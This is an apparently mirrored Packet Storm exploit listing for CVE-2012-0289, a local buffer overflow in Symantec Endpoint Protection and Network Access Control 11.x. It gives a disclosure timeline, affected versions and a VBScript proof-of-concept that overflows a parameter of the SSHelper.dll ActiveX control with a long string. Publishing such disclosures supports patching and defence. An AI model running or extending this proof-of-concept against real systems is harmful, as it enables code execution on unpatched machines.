Lucene search
41.w4r10rPACKETSTORM:113004HistoryMay 23, 2012 - 12:00 a.m.
Symantec End Point Protection / Network Access Control 11.x Code Execution
2012-05-2300:00:00
41.w4r10r
packetstormsecurity.com
26
0.002 Low
EPSS
Percentile
61.5%
`# Symantec End Point Protection 11.x & Symantec Network Access Control 11.x Local Code Execution POC
# Date: 22/05/2012
# Author: 41.w4r10r
# Software Link: Symantec.com
# Version: 11.x
# Tested on:
# Windows XP SP2 English
# Windows XP SP3 English
# Windows Vista 32Bit
# Windows 7 32Bit
# CVE : CVE-2012-0289
Time Line:
30/08/2011 - Sent Details of the vulnerability
31/08/2011 - Symantec Requested Affected Version Details
31/08/2011 - Provided Requested Information with POC
27/09/2011 - Vulnerability Confirmed by Symantec
22/05/2012 - Advisory Released
Symantec Advisory:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120522_01
Affected Products:
Symantec Endpoint Protection
11.0 RU6(11.0.600x)
11.0 RU6-MP1(11.0.6100)
11.0 RU6-MP2(11.0.6200)
11.0 RU6-MP3(11.0.6300)
11.0 RU7(11.0.700x)
11.0 RU7-MP1(11.0.710x)
Symantec Network Access Control
11.0 RU6(11.0.600x)
11.0 RU6-MP1(11.0.6100)
11.0 RU6-MP2(11.0.6200)
11.0 RU6-MP3(11.0.6300)
11.0 RU7(11.0.700x)
11.0 RU7-MP1(11.0.710x)
Affected Resource:
%%System%%\Symantec\Symantec Endpoint Protection\SSHelper.dll
===
POC
===
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' />
<script language='vbscript'>
prototype = "Function HIDownloadURLFile ( ByVal cookie As Long , ByVal
url As String , ByVal file_path As String , ByVal rule_name As String ,
ByVal cancel_message As String , ByVal downloading_time As Long , ByVal
bResume As Boolean , ByVal bShowProgressDlg As Boolean , ByVal
bAllowCancel As Boolean , ByVal username As String , ByVal password As
String , ByVal show_error_delay As Long ) As Long"
memberName = "HIDownloadURLFile"
progid = "SSHELPERLib.SSHelper"
argCount = 12
arg1=1
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=True
arg8=True
arg9=True
arg10="defaultV"
arg11= String(6003, "A")
arg12=1
target.HIDownloadURLFile arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
,arg9 ,arg10 ,arg11 ,arg12
</script></job></package>
`
Related
prion
prion
Buffer overflow
2012-05-23 21:55:00
cve
cve
CVE-2012-0289
2012-05-23 21:55:00
exploitpack
exploitpack
seebug
seebug
Symantec Endpoint Protectionζ¬ε°ζιζεζΌζ΄
2012-05-23 00:00:00
securityvulns
securityvulns
ZDI-12-145 : Symantec Endpoint Protection SemSvc.exe AgentServlet Remote Code Execution Vulnerability
2012-08-27 00:00:00
Symantec Endpoint Protection code execution
2012-08-27 00:00:00
zdi
zdi
exploitdb
exploitdb
nessus
nessus
symantec
symantec
Symantec Endpoint Protection Multiple Issues
2012-05-22 08:00:00